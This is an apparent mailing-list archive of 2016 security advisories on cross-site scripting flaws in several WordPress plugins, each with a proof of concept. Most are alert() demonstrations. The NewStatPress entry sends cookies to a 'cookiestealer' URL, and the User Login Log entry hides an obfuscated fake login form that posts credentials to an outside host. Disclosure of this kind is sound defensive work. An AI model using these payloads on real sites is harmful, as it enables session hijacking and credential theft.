,$_REQUEST['page'], 'new', $this->id, $item['ID'] );
	
[...]
	
        'view'     => sprintf( '<a
href="?page=%s&action=%s&form=%s&entry=%s">'.__( 'View',
TRUST_FORM_DOMAIN ).'</a>', $_REQUEST['page'], 'edit', $this->id,
$item['ID'] ),
	
[...]
	
$delete_url = sprintf( '?page=%s&action=%s&form=%s&entry=%s'
,$_REQUEST['page'], 'delete', $this->id, $item['ID'] );
	
[...]
	
$restore_url = sprintf( '?page=%s&action=%s&form=%s&entry=%s'
,$_REQUEST['page'], 'untrash',$this->id, $item['ID'] );
	
[...]
	
$trash_url = sprintf( '?page=%s&action=%s&form=%s' ,$_REQUEST['page'],
'trash', $item['ID'] );
	
[...]
	
$duplicate_url = sprintf( '?page=%s&action=%s&form=%s',
$_REQUEST['page'], 'duplicate', $item['ID'] );
	
[...]
	
        'edit'      => sprintf( '<a href="?page=%s&action=%s&form=%s">'
.__( 'Edit', TRUST_FORM_DOMAIN ). '</a>', $_REQUEST['page'], 'edit',
$item['ID'] ),
	
[...]
	
$delete_url = sprintf( '?page=%s&action=%s&form=%s' ,$_REQUEST['page'],
'delete', $item['ID'] );
	
[...]
	
$restore_url = sprintf( '?page=%s&action=%s&form=%s' ,$_REQUEST['page'],
'untrash', $item['ID'] );

Normally, the page URL parameter is validated by WordPress, which
prevents Cross-Site Scripting. However in this case the value of page is
obtained from $_REQUEST, not from $_GET. This allows for parameter
pollution where the attacker puts a benign page value in the URL and
simultaneously submits a malicious page value as POST parameter. 

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
<html>
	<body>
		<form
action="http://192.168.146.137/wp-admin/admin.php?page=trust-form-edit"
method="POST">
			<input type="hidden" name="page"
value="&quot;<script>alert(document.cookie);</script>" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_trust_form_wordpress_plugin.html
[2] https://wordpress.org/plugins/trust-form/
------------------------------------------------------------------------
Cross-Site Scripting vulnerability in WP-Filebase Download Manager
WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the WP-Filebase
Download Manager WordPress Plugin. This issue allows an attacker to
perform a wide variety of actions, such as stealing Administrators'
session tokens, or performing arbitrary actions on their behalf. In
order to exploit this issue, the attacker has to lure/force a logged on
WordPress Administrator into opening a malicious website.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0019

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on WP-Filebase Download Manager [2]
WordPress Plugin version 3.4.4.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
There is currently no fix available.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The WP-Filebase Download Manager [2] WordPress Plugin adds a powerful
download manager including file categories, downloads counter, widgets,
sorted file lists and more to your WordPress blog. A Cross-Site
Scripting vulnerability was found in the WP-Filebase Download Manager
WordPress Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing Administrators' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a logged on WordPress
Administrator into opening a malicious website.
 
------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The issue exists in the file AdminGuiFiles.php and is caused by the lack
of output encoding on the page request parameter. The vulnerable code is
listed below.

<form id="posts-filter" action="" method="post">
<input type="hidden" name="page" value="<?php echo $_REQUEST['page'] ?>"
/>
<?php $file_table->display() ?>
</form>

Normally, the page URL parameter is validated by WordPress, which
prevents Cross-Site Scripting. However in this case the value of page is
obtained from $_REQUEST, not from $_GET. This allows for parameter
pollution where the attacker puts a benign page value in the URL and
simultaneously submits a malicious page value as POST parameter.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
<html>
	<body>
		<form
action="http://<target>/wp-admin/admin.php?page=wpfilebase_files"
method="POST">
			<input type="hidden" name="page"
value="&quot;<script>alert(document.cookie);</script>" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_wp_filebase_download_manager_wordpress_plugin.html
[2] https://wordpress.org/plugins/wp-filebase/
------------------------------------------------------------------------
Cross-Site Scripting vulnerability in WP-SpamFree Anti-Spam WordPress
Plugin
------------------------------------------------------------------------
Radjnies Bhansingh, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A reflected Cross-Site Scripting vulnerability exists in the WP-SpamFree
Anti-Spam WordPress plugin. This vulnerability allows an attacker to
perform any action with the privileges of the target user. The affected
code is not protected with an anti-Cross-Site Request Forgery token.
Consequently, it can be exploited by luring the target user into
clicking a specially crafted link or visiting a malicious website (or
advertisement).

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0026

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was succesfully tested on the WP-SpamFree Anti-Spam [2]
WordPress Plugin version 2.1.1.4.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
There is currently no fix available.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
A reflected Cross-Site Scripting vulnerability exists in the WP-SpamFree
Anti-Spam WordPress plugin. This vulnerability allows an attacker to
perform any action with the privileges of the target user. The affected
code is not protected with an anti-Cross-Site Request Forgery token.
Consequently, it can be exploited by luring the target user into
clicking a specially crafted link or visiting a malicious website (or
advertisement).

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The vulnerability exists in the wp-spamfree.php file on line 6049:

$blacklist_keys_update =
trim(stripslashes($_REQUEST['wordpress_comment_blacklist']));

In order to exploit this issue the target user must click a specially
crafted link or visit a malicious website (or advertisement) and must be
autenticated within WordPress.

In addition the WordPress specific blacklist can be cleared by using the
request below and employing CSRF.		
------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
The following proof of concept code demonstrates this issue:
<html>
	<body>
		<form
action="http://<target>/wp-admin/options-general.php?page=wp-spamfree%2Fwp-spamfree.php"
method="POST">
			<input type="hidden" name="submitted_wpsf_general_options"
value="1"/>
			<input type="hidden" name="use_alt_cookie_method" value="on"/>
			<input type="hidden" name="comment_logging_all" value="on"/>
			<input type="hidden" name="enhanced_comment_blacklist" value="on"/>
			<input type="hidden" name="wordpress_comment_blacklist"
value="</textarea><script>alert(1)</script>foo&#13;&#10;bar&#13;&#10;press&#13;&#10;"/>
			<input type="hidden" name="allow_proxy_users" value="on"/>
			<input type="hidden" name="promote_plugin_link" value="on"/>
			<input type="hidden" name="submit_wpsf_general_options"
value="Update&#32;Options&#32;&#37;B"/>
			<input type="submit"/>
		</form>
	</body>
</html>

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_wp_spamfree_anti_spam_wordpress_plugin.html
[2] https://wordpress.org/plugins/wp-spamfree/
------------------------------------------------------------------------
Persistent Cross-Site Scripting in the WordPress NewStatPress plugin
------------------------------------------------------------------------
Han Sahin, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A persistent Cross-Site Scripting (XSS) vulnerability has been found in
the WordPress NewStatPress plugin. By using this vulnerability an
attacker can inject malicious JavaScript code into the application,
which will execute within the browser of any user who views the relevant
application content. 

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0030

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on WordPress NewStatPress plugin [2]
version 1.2.4.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue has been addressed in NewStatPress version 1.2.5. This
version can be download from the NewStatPress GitHub account:
https://github.com/lechab/newstatpress#125 [3] 

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The WordPress NewStatPress plugin [4] is a real-time plugin to manage
the visits' statistics on a WordPress site. It doesn't require external
web analytics. A persistent Cross-Site Scripting vulnerability has been
discovered in the WordPress NewStatPress plugin which allows an
unauthenticated attacker to inject malicious JavaScript code into the
application, which will execute within the browser of any user who views
the relevant application content. The attacker-supplied code can perform
a wide variety of actions, such as stealing victims' session tokens or
login credentials, performing arbitrary actions on their behalf, and
logging their keystrokes or deliver malware.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The WordPress NewStatPress plugin fails to sufficiently check input
supplied to a GET request for a resource on a WordPress site with a
vulnerable version of the NewStatPress plugin. In addition input
supplied to the Referer header is insufficiently sanitized. As a result
a malicious request will be stored on the Last Visitors and Visitors tab
of the Visits page, executing the payload when an unsuspecting user
views one of the mentioned tabs on this page. 

Persistent Cross-Site Scripting vulnerabilities are typically more
serious than reflected vulnerabilities because they do not require a
separate delivery mechanism in order to reach target users, in this case
potentially a WP admin reviewing the stats.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
This vulnerability can be demonstrated by submitting the following
request:
GET /sumofpwn/"><script>alert(document.cookie);</script> HTTP/1.1
Host: 192.168.28.129
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla Chrome/51.0.2704.103 Safari/537.36
Referer:
javascript:document.location=`http://www.XXXXXXyourhackerdomainXXXXXX.nl/demo/xss/cookiestealer.php?c=`+encodeURIComponent(document.cookie);
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8,nl;q=0.6
Connection: close

Based on the above request, the vulnerable output will be:
1) <a href="/?/sumofpwn/\&quot;><script>alert(document.cookie);</script>"
target="_blank">/sumofpwn/\"&gt;<script>alert(document.cookie);</script></a>
2) Arrived from <a href="javascript:document.location=`http://www.sfylabs.nl/demo/xss/cookiestealer.php?c=`+encodeURIComponent(document.cookie);"
target="_blank">javascript:document.location=`http://www.sfylabs.nl/demo/xss/cookiestealer.php?c=`+encodeURIComponent(document.cookie);</a>

http://yourhost/wp-admin/admin.php?page=nsp_main
http://yourhost/wp-admin/admin.php?page=nsp_visits

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_the_wordpress_newstatpress_plugin.html
[2] https://downloads.wordpress.org/plugin/newstatpress.1.2.4.zip
[3] https://github.com/lechab/newstatpress#125
[4] https://wordpress.org/plugins/newstatpress/

------------------------------------------------------------------------
Reflected Cross-Site Scripting in FormBuilder WordPress Plugin
------------------------------------------------------------------------
Burak Kelebek, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A reflected Cross-Site Scripting vulnerability has been found in the
FormBuilder [2] WordPress plugin. This issue allows an attacker to
perform a wide variety of actions, such as stealing Administrators'
session tokens, or performing arbitrary actions on their behalf. In
order to exploit this issue, the attacker has to lure/force a logged on
WordPress Administrator into opening a malicious website.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0006

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on FormBuilder [2] version 1.05

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
A fix for this issue is currently not available.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The FormBuilder [2] WordPress plugin allows you to build contact forms
in the WordPress administrative interface without needing to know PHP or
HTML. 

A reflected Cross-Site Scripting vulnerability has been found in the
FormBuilder WordPress plugin. This issue allows an attacker to perform a
wide variety of actions, such as stealing Administrators' session
tokens, or performing arbitrary actions on their behalf. In order to
exploit this issue, the attacker has to lure/force a logged on WordPress
Administrator into opening a malicious website.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
This issue exists due to the fact that neither the fbmsg or the
formSearchQuery field in the tools.php file validates <script> tags or
perform output encoding. As a result malicious script code can be added
to these fields.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
The following proof of concept code demonstrates this issue:

- http://<target>/wp-admin/tools.php?page=formbuilder.php&pageNumber&fbtag&fbaction=forms&fbmsg=<script>alert(1)</script>n edit it <a href="/wp-admin/tools.php?page=formbuilder.php&pageNumber=&fbtag=&fbaction=editForm&fbid=9">here</a>
- http://<target>/wp-admin/tools.php?page=formbuilder.php&fbaction=formResults&formSearchQuery="><script>alert(1)</script>

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/reflected_cross_site_scripting_in_formbuilder_wordpress_plugin.html
[2] https://wordpress.org/plugins/formbuilder/
------------------------------------------------------------------------
Stored Cross-Site Scripting vulnerability in Contact Form WordPress
Plugin
------------------------------------------------------------------------
Julien Rentrop, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A stored Cross-Site Scripting vulnerability was found in the Contact
Form WordPress Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing users' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a victim into opening a malicious
website/link.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0042

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Contact Form by BestWebSoft [2]
WordPress Plugin version 4.0.0.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is partially resolved in Contact Form version 4.0.2 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Contact Form [2] WordPress Plugin enables sites to receive messages
from customers. A stored Cross-Site Scripting vulnerability was found in
the Contact Form WordPress Plugin. This issue allows an attacker to
perform a wide variety of actions, such as stealing users' session
tokens, or performing arbitrary actions on their behalf. In order to
exploit this issue, the attacker has to lure/force a victim into opening
a malicious website/link.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
When enabled an attachment can be uploaded in the contact form. The
upload accepts html files which will be stored in the
/wp-content/uploads directory. Since we can control the contents of this
html file we can use this as a way to create a Cross-Site Scripting
attack.

The attack here is possible since the validation fails and the unlink
function which cleans up the file is not executed.

Tried to escalate this attack further by getting code execution
(uploading php file), however this is defended by a white list.

Source file:
https://plugins.svn.wordpress.org/contact-form-plugin/trunk/contact_form.php

When apache is configured to show directory listings it's easier to
exploit this attack since we don't need to generate the file name. When
directory listings is not enabled this attack should still be possible,
since the file name is generated with this code:

md5( sanitize_file_name( $_FILES["cntctfrm_contact_attachment"]["name"]
) . time() . $email )

Only time of the server is not exactly known, but could be determined.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
#1 Manual (Or see example request):
Go to page with contact form, select a html file, set some invalid input
(such as email: invalid@..., send.

#2 Navigate to uploaded file:
http://<target>/wp-content/uploads/

#3 Example of stored file:
http://<target>/wp-content/uploads/2016/07/cntctfrm_a407baae7f961b445422446f75575e89_test.html

Request example:

POST / HTTP/1.1
Host: <target>
Content-Length: 605
Content-Type: multipart/form-data;
boundary=----WebKitFormBoundaryPcjU2MvmAMp3t8r0
Connection: close
	
------WebKitFormBoundaryPcjU2MvmAMp3t8r0
Content-Disposition: form-data; name="cntctfrm_contact_attachment";
filename="test.html"
Content-Type: text/html
	
<html>
<body>
Hello world html
</body>
</html>
------WebKitFormBoundaryPcjU2MvmAMp3t8r0
Content-Disposition: form-data; name="cntctfrm_contact_action"
	
send
------WebKitFormBoundaryPcjU2MvmAMp3t8r0
Content-Disposition: form-data; name="cntctfrm_language"
	
default
------WebKitFormBoundaryPcjU2MvmAMp3t8r0--

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/stored_cross_site_scripting_vulnerability_in_contact_form_wordpress_plugin.html
[2] https://wordpress.org/plugins/contact-form-plugin/
[3] https://downloads.wordpress.org/plugin/contact-form-plugin.4.0.2.zip
------------------------------------------------------------------------
Stored Cross-Site Scripting vulnerability in User Login Log WordPress
Plugin
------------------------------------------------------------------------
Axel Koolhaas, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A stored Cross-Site Scripting vulnerability was found in the User Login
Log WordPress Plugin. This issue can be exploited by Subscriber (or
higher) and allows an attacker to perform a wide variety of actions,
such as stealing users' session tokens, or performing arbitrary actions
on their behalf.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0011

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on User Login Log [2] WordPress
Plugin version 2.2.1.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
There is currently no fix available.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The User Login Log [2] WordPress Plugin track records of WordPress user
login with set of multiple information like ip, date , time, country ,
city, and user name. A stored Cross-Site Scripting vulnerability was
found in the User Login Log WordPress Plugin. This issue can be
exploited by Subscriber (or higher) and allows an attacker to perform a
wide variety of actions, such as stealing users' session tokens, or
performing arbitrary actions on their behalf.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
This vulnerability exists due to the lack of encoding of the User-Agent
HTTP request header. This issue exists in method column_default() that
is implemented in the file user-login-log.php.

function column_default($item, $column_name)
{
	
[...]
	
	switch($column_name){
	
[...]
		
	default:
		return $item[$column_name];
	}
}

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
POST /wp-login.php HTTP/1.1
Host: <target>
User-Agent:
XSS<script>document.getElementById(/wpwrap/.toString().substring(1,7)).innerHTML = String.fromCharCode(60,108,105,110,107,32,114,101,108,61,39,115,116,121,108,101,115,104,101,101,116,39,32,105,100,61,39,99,111,108,111,114,115,45,102,114,101,115,104,45,99,115,115,39,32,104,114,101,102,61,39,99,115,115,47,99,111,108,111,114,115,45,102,114,101,115,104,46,99,115,115,39,32,116,121,112,101,61,39,116,101,120,116,47,99,115,115,39,32,109,101,100,105,97,61,39,97,108,108,39,47,62,60,108,105,110,107,32,114,101,108,61,39,115,116,121,108,101,115,104,101,101,116,39,32,105,100,61,39,108,111,103,105,110,45,99,115,115,39,32,104,114,101,102,61,39,99,115,115,47,108,111,103,105,110,46,99,115,115,39,32,116,121,112,101,61,39,116,101,120,116,47,99,115,115,39,32,109,101,100,105,97,61,39,97,108,108,39,47,62,32,60,115,116,121,108,101,62,98,111,100,121,123,98,97,99,107,103,114,111,117,110,100,58,32,110,111,110,101,59,125,35,104,101,97,100,101,114,123,98,97,99,107,103,114,111,117,110,100,58,32,110,111,110,101,59,125,35,108,111,103,105,110,102,111,114,109,123,116,101,120,116,45,97,108,105,103,110,58,32,108,101,102,116,59,125,112,32,35,110,97,118,123,116,101,120,116,45,115,104,97,100,111,119,58,32,114,103,98,97,40,50,53,53,44,50,53,53,44,50,53,53,44,49,41,32,48,32,49,112,120,32,48,59,125,46,115,117,98,109,105,116,123,112,97,100,100,105,110,103,58,32,48,59,125,35,98,97,99,107,116,111,98,108,111,103,32,97,123,99,111,108,111,114,58,32,35,99,99,99,59,125,60,47,115,116,121,108,101,62,32,60,100,105,118,32,105,100,61,34,108,111,103,105,110,34,62,60,104,49,62,60,97,32,104,114,101,102,61,34,104,116,116,112,58,47,47,119,111,114,100,112,114,101,115,115,46,111,114,103,47,34,32,116,105,116,108,101,61,34,80,111,119,101,114,101,100,32,98,121,32,87,111,114,100,80,114,101,115,115,34,62,84,111,116,97,108,108,121,32,76,101,103,105,116,32,76,111,103,105,110,32,70,111,114,109,60,47,97,62,60,47,104,49,62,32,60,102,111,114,109,32,110,97,109,101,61,34,108,111,103,105,110,102,111,114,109,34,32,105,100,61,34,108,111,103,105,110,102,111,114,109,34,32,97,99,116,105,111,110,61,34,104,116,116,112,58,47,47,119,119,119,46,115,104,111,97,108,111,97,107,46,109,108,47,99,111,108,108,101,99,116,34,32,109,101,116,104,111,100,61,34,80,79,83,84,34,32,116,97,114,103,101,116,61,34,104,105,100,100,101,110,45,102,111,114,109,34,62,60,112,62,60,108,97,98,101,108,62,85,115,101,114,110,97,109,101,60,98,114,47,62,60,105,110,112,117,116,32,116,121,112,101,61,34,116,101,120,116,34,32,110,97,109,101,61,34,117,34,32,105,100,61,34,117,115,101,114,95,108,111,103,105,110,34,32,99,108,97,115,115,61,34,105,110,112,117,116,34,32,118,97,108,117,101,61,34,34,32,115,105,122,101,61,34,50,48,34,32,116,97,98,105,110,100,101,120,61,34,49,48,34,47,62,60,47,108,97,98,101,108,62,60,47,112,62,60,112,62,60,108,97,98,101,108,62,80,97,115,115,119,111,114,100,60,98,114,47,62,60,105,110,112,117,116,32,116,121,112,101,61,34,112,97,115,115,119,111,114,100,34,32,110,97,109,101,61,34,112,34,32,105,100,61,34,117,115,101,114,95,112,97,115,115,34,32,99,108,97,115,115,61,34,105,110,112,117,116,34,32,118,97,108,117,101,61,34,34,32,115,105,122,101,61,34,50,48,34,32,116,97,98,105,110,100,101,120,61,34,50,48,34,47,62,60,47,108,97,98,101,108,62,60,47,112,62,60,112,32,115,116,121,108,101,61,34,99,111,108,111,114,58,114,101,100,34,62,83,101,115,115,105,111,110,32,104,97,115,32,101,120,112,105,114,101,100,44,32,112,108,101,97,115,101,32,108,111,103,32,105,110,60,47,112,62,60,112,32,99,108,97,115,115,61,34,102,111,114,103,101,116,109,101,110,111,116,34,62,60,108,97,98,101,108,62,60,105,110,112,117,116,32,110,97,109,101,61,34,114,101,109,101,109,98,101,114,109,101,34,32,116,121,112,101,61,34,99,104,101,99,107,98,111,120,34,32,105,100,61,34,114,101,109,101,109,98,101,114,109,101,34,32,118,97,108,117,101,61,34,102,111,114,101,118,101,114,34,32,116,97,98,105,110,100,101,120,61,34,57,48,34,47,62,32,82,101,109,101,109,98,101,114,32,77,101,60,47,108,97,98,101,108,62,60,47,112,62,60,112,32,99,108,97,115,115,61,34,115,117,98,109,105,116,34,62,60,105,110,112,117,116,32,116,121,112,101,61,34,115,117,98,109,105,116,34,32,110,97,109,101,61,34,119,112,45,115,117,98,109,105,116,34,32,105,100,61,34,119,112,45,115,117,98,109,105,116,34,32,118,97,108,117,101,61,34,76,111,103,32,73,110,34,32,116,97,98,105,110,100,101,120,61,34,49,48,48,34,47,62,60,47,112,62,60,47,102,111,114,109,62,32,60,112,32,105,100,61,34,110,97,118,34,62,60,97,32,104,114,101,102,61,34,46,46,47,119,112,45,108,111,103,105,110,46,112,104,112,63,97,99,116,105,111,110,61,108,111,115,116,112,97,115,115,119,111,114,100,34,32,116,105,116,108,101,61,34,80,97,115,115,119,111,114,100,32,76,111,115,116,32,97,110,100,32,70,111,117,110,100,34,62,76,111,115,116,32,121,111,117,114,32,112,97,115,115,119,111,114,100,63,60,47,97,62,60,47,112,62,60,47,100,105,118,62,60,105,102,114,97,109,101,32,115,116,121,108,101,61,34,100,105,115,112,108,97,121,58,110,111,110,101,34,32,110,97,109,101,61,34,104,105,100,100,101,110,45,102,111,114,109,34,62,60,47,105,102,114,97,109,101,62,32,60,115,99,114,105,112,116,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,116,114,121,123,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,117,115,101,114,95,108,111,103,105,110,39,41,46,102,111,99,117,115,40,41,59,125,99,97,116,99,104,40,101,41,123,125,60,47,115,99,114,105,112,116,62);document.getElementById(/wpwrap/.toString().substring(1,7)).id = /login/.toString().substring(1, 5);document.cookie = String.fromCharCode(39,118,105,115,105,116,101,100,61,116,114,117,101,59,112,97,116,104,61,47,59,109,97,120,45,97,103,101,61,39)+ 60 * 10;</script>XSS
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.8
Accept-Encoding: gzip,deflate,lzma,sdch
Cookie: wordpress_test_cookie=WP+Cookie+check
Connection: close
Content-Type: application/x-www-form-urlencoded
	
log=<user name>&pwd=<password>&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/stored_cross_site_scripting_vulnerability_in_user_login_log_wordpress_plugin.html
[2] https://wordpress.org/plugins/user-login-log/

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ